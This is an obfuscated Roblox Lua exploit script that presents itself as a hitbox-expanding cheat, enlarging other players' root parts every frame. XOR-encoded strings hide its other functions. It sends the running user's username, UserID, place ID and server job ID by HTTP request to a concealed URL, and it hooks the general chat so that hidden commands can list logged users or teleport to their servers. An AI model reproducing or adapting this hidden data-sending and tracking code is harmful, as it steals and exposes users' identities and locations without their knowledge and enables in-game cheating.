--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v23,v24) local v25={};for v46=1, #v23 do v6(v25,v0(v4(v1(v2(v23,v46,v46 + 1 )),v1(v2(v24,1 + (v46% #v24) ,1 + (v46% #v24) + 1 )))%256 ));end return v5(v25);end _G.HeadSize=66 -16 ;_G.Disabled=true;game:GetService(v7("\227\214\213\22\227\169\209\23\210\198","\126\177\163\187\69\134\219\167")).RenderStepped:connect(function() if _G.Disabled then for v51,v52 in next,game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165")):GetPlayers() do if (v52.Name~=game:GetService(v7("\4\187\72\15\185\52\85","\38\84\215\41\118\220\70")).LocalPlayer.Name) then pcall(function() local v63=0 + 0 ;while true do if (v63==(438 -(262 + 176))) then v52.Character.HumanoidRootPart.Size=Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize);v52.Character.HumanoidRootPart.Transparency=1721.7 -(345 + 1376) ;v63=689 -(198 + 490) ;end if (v63==(4 -3)) then v52.Character.HumanoidRootPart.BrickColor=BrickColor.new(v7("\98\19\35\30\242\73\86\32\30\235\85","\158\48\118\66\114"));v52.Character.HumanoidRootPart.Material=v7("\133\33\31\56","\155\203\68\112\86\19\197");v63=4 -2 ;end if (v63==(1208 -(696 + 510))) then v52.Character.HumanoidRootPart.CanCollide=false;break;end end end);end end end end);getgenv().Message=v7("\29\207\51\239\69\108","\152\38\189\86\156\32\24\133");repeat task.wait();until game:IsLoaded() local v9=game:GetService(v7("\204\91\166\95\249\69\180","\38\156\55\199"));local v10=game:GetService(v7("\156\120\112\45\3\123\232\87\155\120\110\62\26\119\255","\35\200\29\28\72\115\20\154"));local v11=game:GetService(v7("\45\186\201\203\174\36\53\13\140\212\205\155\37\55\28","\84\121\223\177\191\237\76"));local v12=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));local v13=v9.LocalPlayer;local v14=v7("\65\86\20\53\90\24\79\106\77\75\19\38\70\80\4\107\74\77\13\106\72\82\9\106\94\71\2\45\70\77\11\54\6\19\82\116\27\26\80\124\25\21\83\125\29\16\85\125\28\20\85\117\6\19\34\10\127\74\12\17\98\26\58\104\64\22\42\14\75\78\51\124\109\73\86\12\96\84\7\63\91\87\52\125\93\21\49\63\26\27\88\19\98\114\8\7\93\99\20\33\102\83\1\40\76\68\9\49\91\118\85\118\4\74\24\29\124\69\45\117\16","\69\41\34\96");local function v15(v26,v27,v28,v29) local v30={[v7("\191\204\217\30\7\37\168","\75\220\163\183\106\98")]=string.format("Username: %s\nUserID: %d\nGameID (PlaceId): %d\nJobID: %s",v26,v27,v28,v29)};local v31=v12:JSONEncode(v30);local v32={[v7("\1\181\133\35\220\12\174\198\35\192\18\191","\185\98\218\235\87")]=v7("\202\44\55\234\215\169\202\40\46\233\208\229\193\47\40\232","\202\171\92\71\134\190")};local v33=http_request or request or HttpPost or syn.request ;if v33 then v33({[v7("\28\211\32","\232\73\161\76")]=v14,[v7("\153\214\70\68","\126\219\185\34\61")]=v31,[v7("\33\203\74\122\113\115","\135\108\174\62\18\30\23\147")]=v7("\134\198\25\255","\167\214\137\74\171\120\206\83"),[v7("\163\245\51\89\253\181\152","\199\235\144\82\61\152")]=v32});else warn(v7("\47\34\141\27\74\36\188\58\18\19\170\63\74\48\172\37\12\2\176\36\9\86\183\34\4\30\173\107\0\19\191\62\9\18\188\37\73\86\142\46\5\30\182\36\12\86\178\36\9\24\173\46\71\24\176\40\15\2\249\44\2\5\188\37\3\19\173\107\16\19\171\47\2\24\247","\75\103\118\217"));end end getgenv().executedPlayers=getgenv().executedPlayers or {} ;local function v17(v34) local v35=0 -0 ;local v36;while true do if (v35==0) then v36=false;for v56,v57 in ipairs(getgenv().executedPlayers) do if (v57.UserId==v34.UserId) then v36=true;break;end end v35=1263 -(1091 + 171) ;end if (v35==(1 + 0)) then if  not v36 then local v62=0 -0 ;while true do if (v62==(0 -0)) then table.insert(getgenv().executedPlayers,{[v7("\233\85\125\17","\126\167\52\16\116\217")]=v34.Name,[v7("\253\61\37\146\157\29","\156\168\78\64\224\212\121")]=v34.UserId,[v7("\55\226\164\205\2\199\161","\174\103\142\197")]=game.PlaceId,[v7("\124\39\93\17\33","\152\54\72\63\88\69\62")]=game.JobId});v15(v34.Name,v34.UserId,game.PlaceId,game.JobId);break;end end end break;end end end local function v18() local v37=374 -(123 + 251) ;while true do if ((0 -0)==v37) then print("Spieler, die das Skript ausgeführt haben:");for v58,v59 in ipairs(getgenv().executedPlayers) do print(v7("\246\193\224\73\192\222\235\78\218\197\227\89\142\132","\60\180\164\142")   .. v59.Name   .. v7("\20\30\48\58\34\255\59\92\4\69","\114\56\62\101\73\71\141")   .. v59.UserId   .. v7("\244\169\235\200\185\234\222\237\188\179\155","\164\216\137\187")   .. (v59.PlaceId or v7("\252\169\16","\107\178\134\81\210\198\158"))   .. v7("\116\78\168\201\168\17\10\216\134","\202\88\110\226\166")   .. (v59.JobId or v7("\237\64\163","\170\163\111\226\151")) );end break;end end end local function v19(v38) local v39=698 -(208 + 490) ;while true do if (v39==(0 + 0)) then for v60,v61 in ipairs(getgenv().executedPlayers) do if ((tostring(v61.UserId)==v38) or (v61.Name:lower()==v38:lower())) then if (v61.PlaceId and v61.JobId) then v10:TeleportToPlaceInstance(v61.PlaceId,v61.JobId,v13);return;else local v66=0 + 0 ;while true do if (v66==0) then print("Spielinformationen für diesen Spieler sind nicht verfügbar.");return;end end end end end print(v7("\34\32\187\61\66\50\59\81\61\187\44\14\51\44\3\112\153\61\64\57\60\31\55\242","\73\113\80\210\88\46\87")   .. v38   .. v7("\193\59\216\0\227\132\108\195\27\228\137\56\141\21\226\135\57\195\22\226\143\98","\135\225\76\173\114") );break;end end end v11.TextChannels.RBXGeneral.OnIncomingMessage=function(v40) local v41=836 -(660 + 176) ;local v42;while true do if (v41==(0 + 0)) then v42=v40.Text;if (v42==v7("\91\248\171\181\190\174","\199\122\141\216\208\204\221")) then v18();elseif (v42:sub(203 -(14 + 188) ,681 -(534 + 141) )==v7("\236\215\31\249\118\182","\150\205\189\112\144\24")) then local v64=0 + 0 ;local v65;while true do if (v64==0) then v65=v42:sub(7 + 0 );if v65 then v19(v65);else print("Ungültige Kennung.");end break;end end elseif (v42==v7("\100\167\183\73\7\131","\112\69\228\223\44\100\232\113")) then local v72=0;local v73;while true do if (v72==(0 + 0)) then v73=v11.TextChannels.RBXGeneral;v73:SendAsync(v7("\252\26\30","\230\180\127\103\179\214\28"));break;end end end break;end end end;v17(v13);local function v21(v43) local v44=game.Players.LocalPlayer;for v47,v48 in ipairs(v44.Backpack:GetChildren()) do if (v48.Name==v43) then return true;end end local v45=v44.Character;if v45 then for v54,v55 in ipairs(v45:GetChildren()) do if (v55:IsA(v7("\184\10\80\74","\128\236\101\63\38\132\33")) and (v55.Name==v43)) then return true;end end end return false;end local v22=false;task.spawn(function() while true do local v49=0;local v50;while true do if (v49==0) then v50=0 -0 ;while true do if ((0 -0)==v50) then task.wait(0.001);if (v21(v7("\152\161\20\4\151\249\196\169\167\2\80\185\229\202","\175\204\201\113\36\214\139")) and  not v22) then local v74=0 -0 ;local v75;while true do if (v74==1) then v75:SendAsync(getgenv().Message);break;end if (v74==(0 + 0)) then v22=true;v75=v11.TextChannels.RBXGeneral;v74=1;end end elseif  not v21(v7("\115\196\48\156\37\85\199\48\210\23\83\195\59\217","\100\39\172\85\188")) then v22=false;end break;end end break;end end end end);
